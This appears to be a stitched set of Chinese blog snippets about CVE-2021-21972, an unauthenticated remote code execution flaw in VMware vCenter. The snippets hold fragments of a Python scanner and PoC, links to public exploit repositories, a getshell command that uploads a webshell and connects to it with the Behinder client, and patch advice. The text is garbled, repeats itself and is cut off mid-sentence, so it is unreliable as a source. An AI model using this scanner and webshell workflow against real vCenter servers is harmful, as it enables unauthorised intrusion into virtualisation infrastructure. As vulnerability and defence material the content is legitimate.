print("[+] URL:{}---存在CVE-2021-21972漏洞".format(url)) # print("[+] Command success result: " + res.text + "\n") with open("存在漏洞地址.txt", 'a') as fw: fw.write(url + '\n') else: print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n") # except Exception...
一,漏洞描述 CVE-2021-21972,vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。 vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,...
=None:#print(jsp)#generate_zip(jsp)ifurl!=None and file_path==None:CVE_2021_21972(url)elif url==None and file_path!=None:multithreading(file_path,10)# 默认15线程if__name__=="__main__":main() 这个POC也很简单,上传了一个测试文件 里面内容是test,返回success 即证明存在该未授权上传漏洞...
POC & EXP POC来自github:https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/blob/main/CVE-2021-21972.py #-*- coding:utf-8 -*- banner = """ 888888ba dP 88 `8b 88 a88aaaa8P' .d8888b. d8888P .d8888b. dP dP 88 `8b. 88' `88 88 Y8ooooo. 88 88 88 ....
POC:https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC Exp payload:https://github.com/NS-Sp4ce/CVE-2021-21972 修复方法及建议: 按照官方提示,关闭插件https://kb.vmware.com/s/article/82374 安全建议 1、升级VMware vCenter Server 与 VMware ESXi 至最新版本。 2、针对 CVE-202...
POC来自github: https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/blob/main/CVE-2021-21972.py #-*- coding:utf-8 -*- banner = """ 888888ba dP 88 `8b 88 a88aaaa8P' .d8888b. d8888P .d8888b. dP dP 88 `8b. 88' `88 88 Y8ooooo. 88 88 88 .88 88. ....
https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC 扫描就是一个玄学。。。 也可以使用nuclei来进行扫描。 6.2 getshell 代码语言:javascript 代码运行次数:0 运行 AI代码解释 https://github.com/NS-Sp4ce/CVE-2021-21972 使用...
python CVE-2021-21972.py -url https://1.1.1.1 冰蝎3连接 /usr/lib/vmware-sca/conf/sca.properties https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC //poc https://github.com/NS-Sp4ce/CVE-2021-21972 //exp
由于目前VMware vCenter远程代码执行(CVE-2021-21972)的PoC已经发布,因此我们将发布包含所有技术细节的文章。 在2020年秋季,我在VMware vCenter的vSphere Client组件中发现了几个漏洞。这些漏洞导致未经授权的客户端可以通过多种协议代表目标服务器执行任意命令并发送请求: ...